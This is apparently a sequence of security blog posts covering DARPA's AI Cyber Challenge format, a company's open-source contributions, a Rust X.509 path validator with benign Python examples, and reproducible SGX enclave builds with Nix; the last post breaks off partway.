Semgrep is a great tool for finding bugs across many disparate technologies. This post introduced 30 new Semgrep rules and discussed two lesser-known features: generic mode and YAML support. Adding YAML and generic searching to Semgrep’s extensive list of supported programming languages makes it an even more universal tool. Heuristics for problematic code or infrastructure and their corresponding findings can be managed in a single location.

If you’d like to read more about our work on Semgrep, we have used its capabilities in several ways, such as securing machine learning pipelines, discovering goroutine leaks, and securing Apollo GraphQL servers.

Contact us if you’re interested in custom Semgrep rules for your project.

Our thoughts on AIxCC’s competition format

18 January 2024 at 14:00

By Michael Brown

Late last month, DARPA officially opened registration for their AI Cyber Challenge (AIxCC). As part of the festivities, DARPA also released some highly anticipated information about the competition: a request for comments (RFC) that contained a sample challenge problem and the scoring methodology. Prior rules documents and FAQs released by DARPA painted the competition’s broad strokes, but with this release, some of the finer details are beginning to emerge.

For those who don’t have time to pore over the 50+ pages of information made available to date, here’s a quick overview of the competition’s structure and our thoughts on it, including areas where we think improvements or clarifications are needed.

The AIxCC is a grand challenge from DARPA in the tradition of the Cyber Grand Challenge and Driverless Grand Challenge.

*** Disclaimer: AIxCC’s rules and scoring methods are subject to change. This summary is for our readership’s awareness and is NOT an authoritative document. Those interested in participating in AIxCC should refer to DARPA’s website and official documents for firsthand information. ***

The competition at a high level

Competing teams are tasked with building AI-driven, fully automated cyber reasoning systems (CRSs) that can identify and patch vulnerabilities in programs. The CRS cannot receive any human assistance while discovering and patching vulnerabilities in challenge projects. Challenge projects are modified versions of critical real-world software like the Linux kernel and the Jenkins automation server. CRSs must submit a proof of vulnerability (PoV) and a proof of understanding (PoU) and may submit a patch for each vulnerability they discover. These components are scored individually and collectively to determine the winning CRS.

The competition has four stages:

  • Registration (January–April 2024): The Open and Small Business tracks are accepting registrations. After submitting concept white papers, up to seven small businesses will be selected for a $1 million prize to fund their participation in AIxCC.
  • Practice Rounds (March–July 2024): Practice and familiarization rounds allow competitors to realistically test their systems.
  • Semifinals (August 2024 at DEF CON): In the first competition round, the top seven teams advance to the final round, each receiving a $2 million prize.
  • Finals (August 2025 at DEF CON): In the grand finale, the top three performing CRSs receive prizes of $4 million, $3 million, and $1.5 million, respectively.

Figure 1: AIxCC events overview

The challenge projects

The challenge projects that each team’s CRS must handle are modeled after real-world software and are very diverse. Challenge problems may include source code written in Java, Rust, Go, JavaScript, TypeScript, Python, Ruby, or PHP, but at least half of them will be C/C++ programs that contain memory corruption vulnerabilities. Other types of vulnerabilities that competitors should expect to see will be drawn from MITRE’s Top 25 Most Dangerous Software Weaknesses.

Challenge problems include source code, a modifiable build process and environment, test harnesses, and a public functionality test suite. Using APIs for these resources, competing CRSs must employ various types of AI/ML and conventional program analysis techniques to discover, locate, trigger, and patch vulnerabilities in the challenge problem. To score points, the CRS must submit a PoV and PoU and may submit a patch. The PoV is an input that will trigger the vulnerability via one of the provided test harnesses. The PoU must specify which sanitizers and harnesses (i.e., vulnerability type, perhaps a CWE number) the PoV will trigger and the lines of code that make up the vulnerability.

The RFC contains a sample challenge problem that reintroduces a vulnerability that was disclosed in 2021 back into the Linux kernel. The challenge problem example provided is a single function written in C with a heap-based buffer overflow vulnerability and an accompanying sample patch. Unfortunately, this example does not come with example fuzzing harnesses, a test suite, or a build harness. DARPA is planning to release more examples with more details in the future, starting with a new example challenge problem from the Jenkins automation server.

Scoring

Each competing CRS will be given an overall score calculated as a function of four components:

  • Vulnerability Discovery Score: Points are awarded for each PoV that triggers the AIxCC sanitizer specified in the accompanying PoU.
  • Program Repair Score: Points are awarded if a patch accompanying the PoV/PoU prevents AIxCC sanitizers from triggering and does not break expected functionality. A small bonus is applied if the patch passes a code linter without error.
  • Accuracy Multiplier: This multiplies the overall score to award CRSs with high accuracy (i.e., minimizing invalid or rejected PoVs, PoUs, and patches).
  • Diversity Multiplier: This multiplies the overall score to award CRSs that handle diverse sets of CWEs and source code languages.

There are a number of intricacies involved in how the scoring algorithm combines these components. For example, successfully patching a discovered vulnerability is heavily incentivized to prevent competitors from focusing solely on vulnerability discovery and ignoring patching. If you're interested in the detailed math, please check out the scoring methodology in the RFC.

General thoughts on AIxCC’s format RFC

In general, we think AIxCC will help significantly advance the state of the art in automated vulnerability detection and remediation. This competition format is a major step beyond the Cyber Grand Challenge in terms of realism for several reasons—namely, the challenge problems 1) are made from real-world software and vulnerabilities, 2) include source code and are compiled to real-world binary formats, and 3) come in many different source languages for many different computing stacks.

Additionally, we think the focus on AI/ML–driven CRSs for this competition will help create new research areas by encouraging new approaches to software analysis problems that conventional approaches have been unable to solve (due to fundamental limits like the halting problem).

Concerns we’ve raised in our RFC response

DARPA has solicited feedback on their scoring algorithm and exemplar challenges by releasing them as an RFC. We responded to their RFC earlier this month and highlighted several concerns that are front of mind for us as we start building our system. We hope that the coming months bring clarifications or changes to address these concerns.

Construction of challenge problems

We have two primary concerns related to the challenge problems. First, it appears that the challenges will be constructed by reinjecting previously disclosed vulnerabilities into recent versions of an open-source project. These vulnerabilities, especially those that have been explained in detail in blog posts, are almost certainly contained in the training data of commercial large language models (LLMs) such as ChatGPT and Claude.

Given their high bandwidth for memorization, CRSs based on these models will be unfairly advantaged when detecting and patching these vulnerabilities compared to other approaches. Combined with the fact that LLMs are known to perform significantly worse on novel instances of problems, this strongly suggests that LLM-based CRSs that score highly in AIxCC will likely struggle when used outside the competition. As a result, we recommend that DARPA not use historic vulnerabilities that were disclosed before the training epoch for partner-provided commercial models to create challenge problems for the competition.

Second, it appears that all challenge problems will be created using open-source projects that will be known to competitors in advance of the competition. This will allow teams to conduct large-scale pre-analysis and specialize their LLMs, fuzzers, and static analyzers to the known source projects and their historical vulnerabilities. Such CRSs would be too specific to the competition and may not be usable on different source projects without significant manual effort to retarget them. To address this potential problem, we recommend that at least 65% of challenge problems be made for source projects that are kept secret prior to each stage of the competition.

PoU granularity

We are concerned about the potential for the scoring algorithm to reject valid PoVs/PoUs if AIxCC sanitizers are overly granular. For example, CWE-787 (out-of-bounds write), CWE-125 (out-of-bounds read), and CWE-119 (out-of-bounds buffer operation) are all listed in the MITRE top 25 weaknesses report. All three could be valid to describe a single vulnerability in a challenge problem and are cross-listed in the CWE database. If multiple sanitizers are provided for each of these CWEs but only one is considered correct, it is possible for otherwise valid submissions to be rejected for failing to properly distinguish between three very closely related sanitizers. We recommend that AIxCC sanitizers be sufficiently coarse-grained to avoid unfair penalization of submitted PoUs.

Scoring

As currently designed, performance metrics (e.g., CPU runtime, memory overhead, etc.) are not directly addressed by the competition's areas of excellence, nor are they factored into functionality scores for patches. Performance is a critical nonfunctional software requirement and an important aspect of patch effectiveness and acceptability. We think it's important for patches generated by competing CRSs to keep the program's performance within an acceptable threshold. Without this consideration in scoring, teams could submit patches that are valid and correct but perform so poorly that they would never be deployed in a real-world scenario. We recommend that the competition's functionality score be augmented with a performance component.

What’s next?

Although we’ve raised some concerns in our RFC response, we’re very excited for the official kickoff in March and the actual competition later this year in August. Look out for our next post in this series, where we will talk about how our prior work in this area has influenced our high-level approach and discuss the technical areas of this competition we find most fascinating.

Celebrating our 2023 open-source contributions

24 January 2024 at 14:00

At Trail of Bits, we pride ourselves on making our best tools open source, such as Slither, PolyTracker, and RPC Investigator. But while this post is about open source, it’s not about our tools…

In 2023, our employees submitted over 450 pull requests (PRs) that were merged into non-Trail of Bits repositories. This demonstrates our commitment to securing the software ecosystem as a whole and to improving software quality for everyone. A representative list of contributions appears at the end of this post, but here are some highlights:

  • Sigstore-conformance, a vital component of our Sigstore initiative in open-source engineering, is an integration test suite for diverse Sigstore client implementations. It rigorously evaluates overall client behavior, covering critical scenarios and aligning with ongoing efforts to establish an official Sigstore client specification, and it integrates into client workflows with minimal configuration.
  • Protobuf-specs is another of our open-source engineering initiatives. It is a collaborative repository for standardized data models and protocols across various Sigstore clients and houses specifications for Sigstore messages. To update the protobuf definitions, contributors use Docker to generate protobuf stubs by running $ make all, which produces Go and Python files under the gen/ directory.
  • pyOpenSSL stands as the predominant Python library for integrating OpenSSL functionality. Over approximately the past nine months, we have been actively involved in cleanup and maintenance tasks on pyOpenSSL as part of our contract with the STF. pyOpenSSL serves as a thin wrapper around a subset of the OpenSSL library, where many object methods simply invoke corresponding functions in the OpenSSL library.
  • Homebrew-core serves as the central repository for the default Homebrew tap, encompassing a collection of software packages and associated formulas for seamless installations. Once you've configured Homebrew on your Mac or Linux system, you can run "brew install" commands for software available in this repository. Emilio Lopez, an application security engineer, actively contributed to this repository by submitting several pull requests that introduce new formulas or update existing ones. Emilio's focus has predominantly been on tools developed by Trail of Bits, such as crytic-compile, solc-select, Caracal, and others. As a result, anyone can install these tools with a straightforward "brew install" command, streamlining the installation process.
  • Ghidra, a National Security Agency Research Directorate creation, is a powerful software reverse engineering (SRE) framework. It offers advanced tools for code analysis on Windows, macOS, and Linux, including disassembly, decompilation, and scripting. Supporting various processor instruction sets, Ghidra serves as a customizable SRE research platform, aiding in the analysis of malicious code for cybersecurity purposes. We fixed numerous bugs to enhance its functionality, particularly in support of our work on DARPA’s AMP (Assured Micropatching) program.

We would like to acknowledge that submitting a PR is only a tiny part of the open-source experience. Someone has to review the PR. Someone has to maintain the code after the PR is merged. And submitters of earlier PRs have to write tests to ensure the functionality of their code is preserved.

We contribute to these projects in part because we love the craft, but also because we find these projects useful. For this, we offer the open-source community our most sincere thanks and wish everyone a happy, safe, and productive 2024!

Some of Trail of Bits’ 2023 open-source contributions

AI/ML

Cryptography

Languages and compilers

Libraries

Tech infrastructure

Software analysis tools

Blockchain software

Reverse engineering tools

Software analysis/transformational tools

Packing ecosystem/supply chain

We build X.509 chains so you don’t have to

25 January 2024 at 14:00

By William Woodruff

For the past eight months, Trail of Bits has worked with the Python Cryptographic Authority to build cryptography-x509-verification, a brand-new, pure-Rust implementation of the X.509 path validation algorithm that TLS and other encryption and authentication protocols are built on. Our implementation is fast, standards-conforming, and memory-safe, giving the Python ecosystem a modern alternative to OpenSSL’s misuse- and vulnerability-prone X.509 APIs for HTTPS certificate verification, among other protocols. This is a foundational security improvement that will benefit every Python network programmer and, consequently, the internet as a whole.

Our implementation has been exposed as a Python API and is included in Cryptography’s 42.0.0 release series, meaning that Python developers can take advantage of it today! Here’s an example usage, demonstrating its interaction with certifi as a root CA bundle:
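
A minimal sketch follows, assuming the PolicyBuilder and Store interfaces from cryptography's x509.verification module; peer and untrusted_intermediates are placeholders for the leaf certificate and intermediates received from a server, and the DNS name is illustrative.

import certifi
from cryptography.x509 import DNSName, load_pem_x509_certificates
from cryptography.x509.verification import PolicyBuilder, Store

# Use certifi's Mozilla-derived CA bundle as the set of trusted roots.
with open(certifi.where(), "rb") as pems:
    store = Store(load_pem_x509_certificates(pems.read()))

# Build a verifier that checks chains presented for a specific server name.
builder = PolicyBuilder().store(store)
verifier = builder.build_server_verifier(DNSName("cryptography.io"))

# peer and untrusted_intermediates stand in for the certificates received
# from the server during the TLS handshake; verify() returns the validated
# chain or raises an error if no trusted chain can be built.
chain = verifier.verify(peer, untrusted_intermediates)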

As part of our design we also developed x509-limbo, a test vector and harness suite for evaluating the standards conformance and consistent behavior of various X.509 path validation implementations. x509-limbo is permissively licensed and reusable, and has already found validation differentials across Go’s crypto/x509, OpenSSL, and two popular pre-existing Rust X.509 validators.

X.509 path validation

X.509 and path validation are both too expansive to reasonably summarize in a single post. Instead, we’ll grossly oversimplify X.509 to two basic facts:

  1. X.509 is a certificate format: it binds a public key and some metadata for that key (what it can be used for, the subject it identifies) to a signature, which is produced by a private key. The subject of a certificate can be a domain name, or some other relevant identifier.
  2. Verifying an X.509 certificate entails obtaining the public key for its signature, using that public key to check the signature, and (finally) validating the associated metadata against a set of validity rules (sometimes called an X.509 profile). In the context of the public web, there are two profiles that matter: RFC 5280 and the CA/B Forum Baseline Requirements (“CABF BRs”).

These two facts make X.509 certificates chainable: an X.509 certificate’s signature can be verified by finding the parent certificate containing the appropriate public key; the parent, in turn, has its own parent. This chain building process continues until an a priori trusted certificate is encountered, typically because of trust asserted in the host OS itself (which maintains a pre-configured set of trusted certificates).

Chain building (also called “path validation”) is the cornerstone of TLS’s authentication guarantees: it allows a web server (like x509-limbo.com) to serve an untrusted “leaf” certificate along with zero or more untrusted parents (called intermediates), which must ultimately chain to a root certificate that the connecting client already knows and trusts.

As a visualization, here is a valid certificate chain for x509-limbo.com, with arrows representing the “signed by” relationship:

In this scenario, x509-limbo.com serves us two initially untrusted certificates: the leaf certificate for x509-limbo.com itself, along with an intermediate (Let’s Encrypt R3) that signs for the leaf.

The intermediate in turn is signed for by a root certificate (ISRG Root X1) that’s already trusted (by virtue of being in our OS or runtime trust store), giving us confidence in the complete chain, and thus the leaf’s public key for the purposes of TLS session initiation.

What can go wrong?

The above explanation of X.509 and path validation paints a bucolic picture: to build the chain, we simply iterate through our parent candidates at each step, terminating on success once we reach a root of trust or with failure upon exhausting all candidates. Simple, right?

Unfortunately, the reality is far messier:

  • The abstraction above (“one certificate, one public key”) is a gross oversimplification. In reality, a single public key (corresponding to a single “logical” issuing authority) may have multiple “physical” certificates, for cross-issuance purposes.
  • Because the trusted set is defined by the host OS or language runtime, there is no “one true” chain for a given leaf certificate. In reality, most (leaf, [intermediates]) tuples have several candidate solutions, any of which is a valid chain.
    • This is the “why” for the first bullet: a web server can’t guarantee that any particular client has any particular set of trusted roots, so intermediate issuers typically have multiple certificates for a single public key to maximize the likelihood of a successfully built chain.
  • Not all certificates are made equal: certificates (including different “physical” certificates for the same “logical” issuing authority) can contain constraints that prevent otherwise valid paths: name restrictions, overall length restrictions, usage restrictions, and so forth. In other words, a correct path building implementation must be able to backtrack after encountering a constraint that eliminates the current candidate chain.
  • The X.509 profile itself can impose constraints on both the overall chain and its constituent members: the CABF BRs, for example, forbid known-weak signature algorithms and public key types, and many path validation libraries additionally allow users to constrain valid chain constructions below a configurable maximum length.

In practice, these (non-exhaustive) complications mean that our simple recursive linear scan for chain building is really a depth-first graph search with both static and dynamic constraints. Failing to treat it as such has catastrophic consequences:

  • Failing to implement a dynamic search typically results in overly conservative chain constructions, sometimes with Internet-breaking outcomes. OpenSSL 1.0.x’s inability to build the “chain of pain” in 2020 is one recent example of this.
  • Failing to honor the interior constraints and profile-wide certificate requirements can result in overly permissive chain constructions. CVE-2021-3450 is one recent example of this, causing some configurations of OpenSSL 1.1.x to accept chains built with non-CA certificates.

Consequently, building an X.509 path validator that is both correct and maximal (in the sense of finding any valid chain) is of the utmost importance, both for availability and security.
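
To make the shape of that search concrete, here is a minimal, hypothetical Python sketch of chain building as a depth-first search with backtracking. The helpers issuers_of, permits, and permits_link are illustrative stand-ins for candidate lookup and the static and dynamic constraint checks described above, not the API of our implementation.

def build_chain(leaf, intermediates, trust_store, policy, depth=0):
    # Reject the current candidate if it violates static, per-certificate
    # checks (signature algorithm, key type, validity window, ...) or the
    # configured maximum chain depth.
    if depth > policy.max_depth or not policy.permits(leaf):
        return None

    # Success case: a trusted root signs for the current certificate.
    for root in trust_store.issuers_of(leaf):
        if policy.permits_link(root, leaf):
            return [leaf, root]

    # Otherwise, try every untrusted intermediate and backtrack on failure.
    for candidate in intermediates.issuers_of(leaf):
        if not policy.permits_link(candidate, leaf):
            continue  # e.g., a name or path-length constraint eliminates it
        rest = build_chain(candidate, intermediates, trust_store, policy, depth + 1)
        if rest is not None:
            return [leaf] + rest

    return None  # all candidates exhausted: no valid chain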

Quirks, surprises, and ambiguities

Despite underpinning the Web PKI and other critical pieces of Internet infrastructure, there are relatively few independent implementations of X.509 path validation: most platforms and languages reuse one of a small handful of common implementations (OpenSSL and its forks, NSS, Go’s crypto/x509, GnuTLS, etc.) or the host OS’s implementation (CryptoAPI on Windows, Security on macOS). This manifests as a few recurring quirks and ambiguities:

  • A lack of implementation diversity means that mistakes and design decisions (such as overly or insufficiently conservative profile checks) leak into other implementations: users complain when a PKI deployment that was only tested on OpenSSL fails to work against crypto/x509, so implementations frequently bend their specification adherence to accommodate real-world certificates.
  • The specifications often mandate surprising behavior that (virtually) no client implements correctly. RFC 5280, for example, stipulates that path length and name constraints do not apply to self-issued intermediates, but this is widely ignored in practice.
  • Because the specifications themselves are so infrequently interpreted, they contain still-unresolved ambiguities: treating roots as “trust anchors” versus policy-bearing certificates, handling of serial numbers that are 20 bytes long but DER-encoded with 21 bytes, and so forth.

Our implementation needed to handle each of these families of quirks. To do so consistently, we leaned on four basic strategies:

  • Test first, then implement: To give ourselves confidence in our designs, we built x509-limbo and pre-validated it against other implementations. This gave us both a coverage baseline for our own implementation, and empirical justification for relaxing various policy-level checks, where necessary.
  • Keep everything in Rust: Rust’s performance, strong type system and safety properties meant that we could make rapid iterations to our design while focusing on algorithmic correctness rather than memory safety. It certainly didn’t hurt that PyCA Cryptography’s X.509 parsing is already done in Rust, of course.
  • Obey Sleevi’s Laws: Our implementation treats path construction and path validation as a single unified step with no “one” true chain, meaning that the entire graph is always searched before giving up and returning a failure to the user.
  • Compromise where necessary: As mentioned above, implementations frequently maintain compatibility with OpenSSL, even where doing so violates the profiles defined in RFC 5280 and the CABF BRs. This situation has improved dramatically over the years (and improvements have accelerated in pace, as certificate issuance periods have shortened on the Web PKI), but some compromises are still necessary.

Looking forward

Our initial implementation is production-ready, and comes in at around 2,500 lines of Rust, not counting the relatively small Python-only API surfaces or x509-limbo.

From here, there’s much that could be done. Some ideas we have include:

  • Expose APIs for client certificate path validation. To expedite things, we’ve focused the initial implementation on server validation (verifying that a leaf certificate attesting to a specific DNS name or IP address chains up to a root of trust). This ignores client validation, wherein the client side of a connection presents its own certificate for the server to verify against a set of known principals. Client path validation shares the same fundamental chain building algorithm as server validation, but has a slightly different ideal public API (since the client’s identity needs to be matched against a potentially arbitrary number of identities known to the server).
  • Expose different X.509 profiles (and more configuration knobs). The current APIs expose very little configuration; the only things a user of the Python API can change are the certificate subject, the validation time, and the maximum chain depth. Going forward, we’ll look into exposing additional knobs, including pieces of state that will allow users to perform verifications with the RFC 5280 certificate profile and other common profiles (like Microsoft’s Authenticode profile). Long term, this will help bespoke (such as corporate) PKI use cases to migrate to Cryptography’s X.509 APIs and lessen their dependency on OpenSSL.
  • Carcinize existing C and C++ X.509 users. One of Rust’s greatest strengths is its native, zero-cost compatibility with C and C++. Given that C and C++ implementations of X.509 and path validation have historically been significant sources of exploitable memory corruption bugs, we believe that a thin “native” wrapper around cryptography-x509-verification could have an outsized positive impact on the security of major C and C++ codebases.
  • Spread the gospel of x509-limbo. x509-limbo was an instrumental component in our ability to confidently ship an X.509 path validator. We’ve written it in such a way that should make integration into other path validation implementations as simple as downloading and consuming a single JSON file. We look forward to helping other implementations (such as rustls-webpki) integrate it directly into their own testing regimens!

If any of these ideas interests you (or you have any of your own), please get in touch! Open source is key to our mission at Trail of Bits, and we’d love to hear about how we can help you and your team take the fullest advantage of and further secure the open-source ecosystem.

Acknowledgments

This work required the coordination of multiple independent parties. We would like to express our sincere gratitude to each of the following groups and individuals:

  • The Sovereign Tech Fund, whose vision for OSS security and funding made this work possible.
  • The PyCA Cryptography maintainers (Paul Kehrer and Alex Gaynor), who scoped this work from the very beginning and offered constant feedback and review throughout the development process.
  • The BetterTLS development team, who both reviewed and merged patches that enabled x509-limbo to vendor and reuse their (extensive) testsuite.

Enhancing trust for SGX enclaves

26 January 2024 at 14:00

By Artur Cygan

Creating reproducible builds for SGX enclaves used in privacy-oriented deployments is a difficult task that lacks a convenient and robust solution. We propose using Nix to achieve reproducible and transparent enclave builds so that anyone can audit whether the enclave is running the source code it claims, thereby enhancing the security of SGX systems.

In this blog post, we will explain how we enhanced trust for SGX enclaves through the following steps:

  • Analyzed reproducible builds of Signal and MobileCoin enclaves
  • Analyzed a reproducible SGX SDK build from Intel
  • Packaged the SGX SDK in Nixpkgs
  • Prepared a reproducible-sgx repository demonstrating how to build SGX enclaves with Nix

Background

Introduced in 2015, Intel SGX is an implementation of confidential (or trusted) computing. More specifically, it is a trusted execution environment (TEE) that allows users to run confidential computations on a remote computer owned and maintained by an untrusted party. Users trust the manufacturer (Intel, in this case) of a piece of hardware (CPU) to protect the execution environment from tampering, even by the highest privilege–level code, such as kernel malware. SGX code and data live in special encrypted and authenticated memory areas called enclaves.

During my work at Trail of Bits, I observed a poorly addressed trust gap in systems that use SGX, where the user of an enclave doesn't necessarily trust the enclave author. Instead, the user is free to audit the enclave's open-source code to verify its functionality and security. This setting can be observed, for instance, in privacy-oriented deployments such as Signal's contact discovery service or MobileCoin's consensus protocol. To validate trust, the user must check whether the enclave was built from trusted code. Unfortunately, this turns out to be a difficult task because the builds tend to be difficult to reproduce and rely on a substantial amount of precompiled binary code. In practice, hardly anyone verifies the builds, leaving users with no option but to trust the enclave author.

To give another perspective—a similar situation happens in the blockchain world, where smart contracts are deployed as bytecode. For instance, Etherscan will try to reproduce on-chain EVM bytecode to attest that it was compiled from the claimed Solidity source code. Users are free to perform the same operation if they don’t trust Etherscan.

A solution to this problem is to build SGX enclaves in a reproducible and transparent way so that multiple parties can independently arrive at the same result and audit the build for any supply chain–related issues. To achieve this goal, I helped port Intel’s SGX SDK to Nixpkgs, which allows building SGX enclaves with the Nix package manager in a fully reproducible way so any user can verify that the build is based on trusted code.

To see how reproducible builds complete the trust chain, it is important to first understand what guarantees SGX provides.

How does an enclave prove its identity?

Apart from the above mentioned TEE protection (nothing leaks out and execution can’t be altered), SGX can remotely prove the enclave’s identity, including its code hash, signature, and runtime configuration. This feature is called remote attestation and can be a bit foreign for someone unfamiliar with this type of technology.

When an enclave is loaded, its initial state (including code) is hashed by the CPU into a measurement hash, also known as MRENCLAVE. The hash changes only if the enclave's code changes. This hash, along with other data such as the signer and environment details, is placed in a special memory area accessible only to the SGX implementation. The enclave can ask the CPU to produce a report containing all this data, including a piece of enclave-defined data (called report_data), and then pass it to the special Intel-signed quoting enclave, which signs the report (the signed report is called a quote from now on) so that it can be delivered to the remote party and verified.

Next, the verifier checks the quote's authenticity with Intel and inspects the relevant information it contains. Although there are a few additional checks and steps at this point, in our case, the most important thing to check is the measurement hash, which is a key component of trust verification.

What do we verify the hash against? The simplest solution is to hard code a trusted MRENCLAVE value into the client application itself. This solution is used, for instance, by Signal, where MRENCLAVE is placed in the client’s build config and verified against the hash from the signed quote sent by the Signal server. Bundling the client and MRENCLAVE makes sense; after all, we need to audit and trust the client application code too. The downside is that the client application has to be rebuilt and re-released when the enclave code changes. If the enclave modifications are expected to be frequent or if it is important to quickly move clients to another enclave—for instance, in the event of a security issue—clients can use a more dynamic approach and fetch MRENCLAVE values from trusted third parties.
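
As a rough illustration of the Signal-style approach, the client-side check can be as small as a constant-time comparison against a pinned measurement. The following hypothetical Python sketch assumes the quote has already been authenticated and its 32-byte MRENCLAVE field extracted; the names and placeholder value are illustrative, not any particular client's API.

import hmac

# Placeholder value: in practice this is the hash reproduced from the audited
# source and baked into the client's build configuration.
TRUSTED_MRENCLAVE = bytes.fromhex("00" * 32)

def enclave_is_trusted(quote_mrenclave: bytes) -> bool:
    # Compare the measurement from an already-verified quote against the
    # pinned value in constant time.
    return hmac.compare_digest(quote_mrenclave, TRUSTED_MRENCLAVE)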

Secure communication channel

SGX can prove the identity of an enclave and a piece of report_data that was produced by it, but it's up to the enclave and verifier to establish a trusted and secure communication channel. Since SGX enclaves are flexible and can freely communicate with the outside world over the network through ECALLs and OCALLs, SGX itself doesn't impose any specific protocol or implementation for the channel. The enclave developer is free to decide, as long as the channel is encrypted, is authenticated, and terminates inside the enclave.

For instance, the SGX SDK implements an example of an authenticated key exchange scheme for remote attestation. However, the scheme assumes a DRM-like system where the enclave’s signer is trusted and the server’s public key is hard coded in the enclave’s code, so it’s unsuitable for use in a privacy-oriented deployment of SGX such as Signal.

If we don’t trust the enclave’s author, we can leverage the report_data to establish such a channel. This is where the SGX guarantees essentially end, and from now on, we have to trust the enclave’s source code to do the right thing. This fact is not obvious at first but becomes evident if we look, for instance, at the RA-TLS paper on how to establish a secure TLS channel that terminates inside an enclave:

The enclave generates a new public-private RA-TLS key pair at every startup. The RA-TLS key need not be persisted since generating a fresh key on startup is reasonably cheap. Not persisting the key reduces the key’s exposure and avoids common problems related to persistence such as state rollback protection. Interested parties can inspect the source code to convince themselves that the key is never exposed outside of the enclave.

To maintain the trust chain, RA-TLS uses the report_data from the quote that commits to the enclave’s public key hash. A similar method can be observed in the Signal protocol implementing Noise Pipes and committing to the handshake hash in the report_data.
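
On the verifier's side, such a channel binding boils down to recomputing the commitment and comparing it against the attested report_data. Here is a minimal, hypothetical Python sketch; the exact commitment layout (here, a SHA-256 hash of the channel's public key padded to the 64-byte report_data field) is an assumption and differs between RA-TLS, Signal's protocol, and other deployments.

import hashlib
import hmac

def channel_binding_ok(report_data: bytes, channel_pubkey: bytes) -> bool:
    # Recompute the commitment the enclave claims to have placed in its
    # 64-byte report_data field and compare in constant time.
    expected = hashlib.sha256(channel_pubkey).digest().ljust(64, b"\x00")
    return hmac.compare_digest(report_data, expected)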

SGX encrypts and authenticates the enclave’s memory, but it’s up to the code running in the enclave to protect the data. Nothing stops the enclave code from disclosing any information to the outside world. If we don’t know what code runs in the enclave, anything can happen.

Fortunately, we know the code because it’s open source, but how do we make sure that the code at a particular Git commit maps to the MRENCLAVE hash an enclave is presenting? We have to reproduce the enclave build, calculate its MRENCLAVE hash, and compare it with the hash obtained from the quote. If the build can’t be reproduced, our remaining options are either to trust someone who confirmed the enclave is safe to use or to audit the enclave’s binary code.

Why are reproducible builds hard?

The reproducibility type we care about is bit-for-bit reproducibility. Some software might be semantically identical despite minor differences in their artifacts. SGX enclaves are built into .dll or .so files using the SGX SDK and must be signed with the author’s RSA key. Since we calculate hashes of artifacts, even a one-bit difference will produce a different hash. We might get away with minor differences, as the measurement process omits some details from the enclave executable file (such as the signer), but having full file reproducibility is desirable. This is a non-trivial task and can be implemented in multiple ways.

Both Signal and MobileCoin treat this task seriously and aim to provide a reproducible build for their enclaves. For example, Signal claims the following:

The enclave code builds reproducibly, so anyone can verify that the published source code corresponds to the MRENCLAVE value of the remote enclave.

The initial version of Signal’s contact discovery service build (archived early 2023) is based on Debian and uses a .buildinfo file to lock down the system dependencies; however, locking is done based on versions rather than hashes. This is a limitation of Debian, as we read on the BuildinfoFiles page. The SGX SDK and a few other software packages are built from sources fetched without checking the hash of downloaded data. While those are not necessarily red flags, more trust than necessary is placed in third parties (Debian and GitHub).

From the README, it is unclear how the .buildinfo file is produced because there is no source for the mentioned derebuild.pl script. Most likely, the .buildinfo file is generated during the original build of the enclave’s Debian package and checked into the repository. It is unclear whether this mechanism guarantees capture of all the build inputs and doesn’t let any implicit dependencies fall through the cracks. Unfortunately, I couldn’t reproduce the build because both the Docker and Debian instructions from the README failed, and shortly after that, I noticed that Signal moved to a new iteration of the contact discovery service.

The current version of Signal’s contact discovery service build is slightly different. Although I didn’t test the build, it’s based on a Docker image that suffers from similar issues such as installing dependencies from a system package manager with network access, which doesn’t guarantee reproducibility.

Another example is MobileCoin, which provides a prebuilt Docker image with a build environment for the enclave. Building the same image from Dockerfile most likely won’t result in a reproducible hash we can validate, so the image provided by MobileCoin must be used to reproduce the enclave. The problem here is that it’s quite difficult to audit Docker images that are hundreds of megabytes large, and we essentially need to trust MobileCoin that the image is safe.

Docker is a popular choice for reproducing environments, but it doesn’t come with any tools to support bit-for-bit reproducibility and instead focuses on delivering functionally similar environments. A complex Docker image might reproduce the build for a limited time, but the builds will inevitably diverge, if no special care is taken, due to filesystem timestamps, randomness, and unrestricted network access.

Why Nix can do it better

Nix is a cross-platform source-based package manager that features the Nix language to describe packages and a large collection of community-maintained packages called Nixpkgs. NixOS is a Linux distribution built on top of Nix and Nixpkgs, and is designed from the ground up to focus on reproducibility. It is very different from conventional package managers. For instance, it doesn't install anything into regular system paths like /bin or /usr/lib. Instead, it uses its own /nix/store directory and symlinks to the packages installed there. Every package is prefixed with a hash capturing all of the build inputs, such as the dependency graph or compilation options. This means that it is possible to have the same package installed in multiple variants differing only by build options; from Nix's perspective, it is a different package.

Nix does a great job at surfacing most of the issues that could render the build unreproducible. For example, a Nix build will most likely break during development when an impurity (i.e., a dependency that is not explicitly declared as input to the build) is encountered, forcing the developer to fix it. Impurities are often captured from the environment, which includes environment variables or hard-coded system-wide directories like /usr/lib. Nix aims to address all those issues by sandboxing the builds and fixing the filesystem timestamps. Nix also requires all inputs that are fetched from the network to be pinned. On top of that, Nixpkgs contain many patches (gnumake, for instance) to fix reproducibility issues in common software such as compilers or build systems.

Reducing impurities increases the chance of build reproducibility, which in turn increases the trust in source-to-artifact correspondence. However, ultimately, reproducibility is not something that can be proven or guaranteed. Under the hood, a typical Nix build runs compilers that could rely on some source of randomness that could leak into the compiled artifacts. Ideally, reproducibility should be tracked on an ongoing basis. An example of such a setup is the r13y.com site, which tracks reproducibility of the NixOS image itself.

Apart from strong reproducibility properties, Nix also shines when it comes to dependency transparency. While Nix caches the build outputs by default, every package can be built from source, and the dependency graph is rooted in an easily auditable stage0 bootstrap, which reduces trust in precompiled binary code to the minimum.

Issues in Intel’s use of Nix

Remember the quoting enclave that signs attestation reports? To deliver all SGX features, Intel needed to create a set of privileged architectural enclaves, signed by Intel, that perform tasks too complex to implement in CPU microcode. The quoting enclave is one of them. These enclaves are a critical piece of SGX because they have access to hardware keys burned into the CPU and perform trusted tasks such as remote attestation. However, a bug in the quoting enclave’s code could invalidate the security guarantees of the whole remote attestation protocol.

Being aware of that, Intel prepared a reproducible Nix-based build that builds SGX SDK (required to build any enclave) and all architectural enclaves. The solution uses Nix inside a Docker container. I was able to reproduce the build, but after a closer examination, I identified a number of issues with it.

First, the build doesn’t pin the Docker image or the SDK source hashes. The SDK can be built from source, but the architectural enclaves build downloads a precompiled SDK installer from Intel and doesn’t even check the hash. Although Nix is used, there are many steps that happen outside the Nix build.

